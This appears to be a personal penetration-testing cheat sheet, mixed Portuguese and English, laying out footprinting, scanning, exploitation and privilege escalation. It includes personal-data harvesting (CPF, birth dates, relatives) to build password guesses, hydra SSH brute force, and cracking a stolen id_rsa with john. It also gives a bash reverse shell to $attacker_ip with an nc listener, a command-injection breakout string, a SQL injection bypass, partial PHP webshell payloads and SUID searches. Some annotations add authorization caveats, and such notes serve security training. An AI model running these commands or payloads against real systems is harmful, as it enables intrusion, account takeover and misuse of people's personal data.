# Pentest script

# 1 - Footprint:
1 - whois ( owner, ownerid, nic-hdl-br, email, person )
2 - Google ( dork: `site:<domínio ou TLD> intext:"<termo>"` — e.g. `site:.br intext:"termo"`; the operator is `intext:` (not `intexto`) and `site:` takes a domain or TLD, not a country name )
3 - theHarvester
4 - Unsec ToolKit ( cpf, nome, cnpj )
5 - Unsec Pass Breaker : { Get nic-hdl-br, data-nasc-target, data-nasc-mãe, filhos ou esposa, numero de telefone, cpf. } !( mistura de datas também )! ex: mae+filho+esposa, filho,esposa,mae filho1+filho2+filho3 propriadata+esposa+filho, etc... mistura de iniciais e nomes também!!!
6 - Consultas Telegram
   Scope note: steps 4-6 collect personal data (CPF, birth dates, relatives). Only do this for people explicitly named in the written authorization, and treat unofficial "consulta" bots on Telegram as an unlawful data source (leaked databases, LGPD) — do not use them in a contracted engagement.

# 2 - Scanning:
1 - Nmap
2 - Gobuster
3 - ffuf
4 - wpscan
5 - joomla scan (joomscan)
6 - sublist3r
7 - searchsploit

# 3 - Exploit:
1 - searchsploit $service_name $version
2 - msfconsole -> search $service_name $version
3 - xplsearch -> $service_name $version
4 - exploit-db -> site de busca de exploits
5 - revshells -> gerador de reverse shells
6 - GTFOBins -> lista de binários que permitem escalação de privilégio (sudo/SUID/capabilities)
7 - Sploitus -> lista de exploits https://sploitus.com/

# 4 - Brute-force:
1 - hydra
2 - john the ripper

# COMANDOS

# WHOIS
whoami@pentestbox$ whois $domain    # bare domain or IP, not a full URL

# NMAP
nmap -sV -T4 -vv -p- -Pn $ip | tee -a ports.txt
nmap -sV -T4 -vv -Pn $ip -p- --min-rate 100000 | tee -a ports.txt
nmap -sV -T3 -vv -Pn $ip -p- --min-rate 100000 | tee -a ports.txt
nmap -sV -sC -vv -oA full_scan -Pn $ip -p- --min-rate 100000 | tee -a ports.txt
# -oA needs a basename: written as `-oA -Pn`, nmap takes "-Pn" as the output filename and ping suppression is silently lost.
# --min-rate 100000 is far beyond what most links/targets sustain — expect dropped probes and missed ports (and IDS alerts). Confirm open ports with a second, slower pass (e.g. --min-rate 1000 or no --min-rate) before trusting ports.txt.

# WEB RECON
dirb http://$ip/
gobuster dir -w /usr/share/SecLists/Discovery/Web-Content/common.txt -u http://$ip/    # gobuster 3.x requires the `dir` subcommand; the subcommand-less form is the old 2.x syntax
ffuf -u http://$ip/FUZZ -w /usr/share/SecLists/Discovery/Web-Content/raft-small-words.txt -fw 1
ffuf -u http://$ip/FUZZ -w /usr/share/SecLists/Discovery/Web-Content/raft-large-files.txt -fw 1
# -fw 1 only hides responses with exactly one word; if the target's "not found" page is larger, use -ac (auto-calibrate) or -fs/-fw tuned to that page.
wpscan --url http://$url/

# Wordlists list
/usr/share/SecLists/Passwords/rockyou.txt
/usr/share/SecLists/Discovery/Web-Content/raft-large-files.txt
/usr/share/SecLists/Discovery/Web-Content/quickhits.txt
/usr/share/SecLists/Discovery/Web-Content/raft-small-words.txt

# % BRUTE-FORCE HYDRA METHODS %
1) hydra -l $login -P /usr/share/SecLists/Passwords/rockyou.txt $ip ssh
   (path made consistent with the Wordlists list above — check where rockyou.txt actually lives on your box; against SSH also cap parallelism with `-t 4`, otherwise sshd's MaxStartups/fail2ban will drop connections and you get false negatives, and expect account lockout on hardened targets)
fontes (sources):
https://initone.com.br/HydraBruteForce/

# % BRUTE-FORCE JOHN METHODS %
1) get the id_rsa in -> /home/$user/.ssh/id_rsa
2) run ssh2john.py id_rsa > id_rsa.hash
3) run john --wordlist=rockyou.txt id_rsa.hash
4) get the passphrase, `chmod 600 id_rsa` (ssh refuses a key with permissive modes), and run 'ssh -i id_rsa $root_user@$server_ip'
5) [!!!] JACKPOT [!!!]

# % PWN %
# in attacker shell
1) ifconfig tun0   (or `ip a show tun0`) — and have a listener up on the port used below before triggering the shell, e.g. `nc -lvnp 6669`
# in victim shell or RCE flaw (falha)
1) bash -i >& /dev/tcp/$attacker_ip/6669 0>&1
   (`/dev/tcp` and `>&` are bash-only; if the RCE executes through /bin/sh, wrap it as `bash -c '...'` or it fails silently)
# webshells generator
https://www.revshells.com/

# STRINGS XPL
# BREAK OUT OF THE QUOTED PARAMETER (HTTP POST TO RCE) USE THIS -> " ` $COMMAND ` "

# SQL BYPASS
xpl' or 1=1#

# php webshell RCE exploit
# NOTE: the PHP open tag and function call were stripped by the page extractor, so the three payloads below are truncated — rebuild them from revshells.com rather than copying these fragments.
1)
2) & /dev/tcp/$atacker_ip/6669 0>&1");?>
3) &%20/dev/tcp/$atacker_ip/$port%200>&1");?>

# xss

# STTY TERM
# In reverse shell
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
# In attacker shell
$ stty raw -echo
$ fg
# In reverse shell
export TERM=xterm
# (optionally `stty rows <N> cols <M>` to match your terminal so editors/pagers render correctly)
# nice sources about tty shells --> https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

# PRIVILEGE ESCALATION
# commands the current user may run via sudo (check each one on GTFOBins) -> sudo -l
# find SUID binaries (owned by root, check each one on GTFOBins)
1 - find / -type f -perm -4000 2>/dev/null
2 - find / -user root -type f -perm -4000 -exec ls -ldb {} \; 2>/dev/null
3 - find / -type f -perm -4000 2> /dev/null | xargs ls -lah
# find ssh keys -> ls -la ~/.ssh/ (id_rsa, id_ed25519, authorized_keys)

# VULNERABILITIES (FALHAS) TO ATTEMPT
1) XXE
2) RCE
3) LFI
4) SQL
5) XSS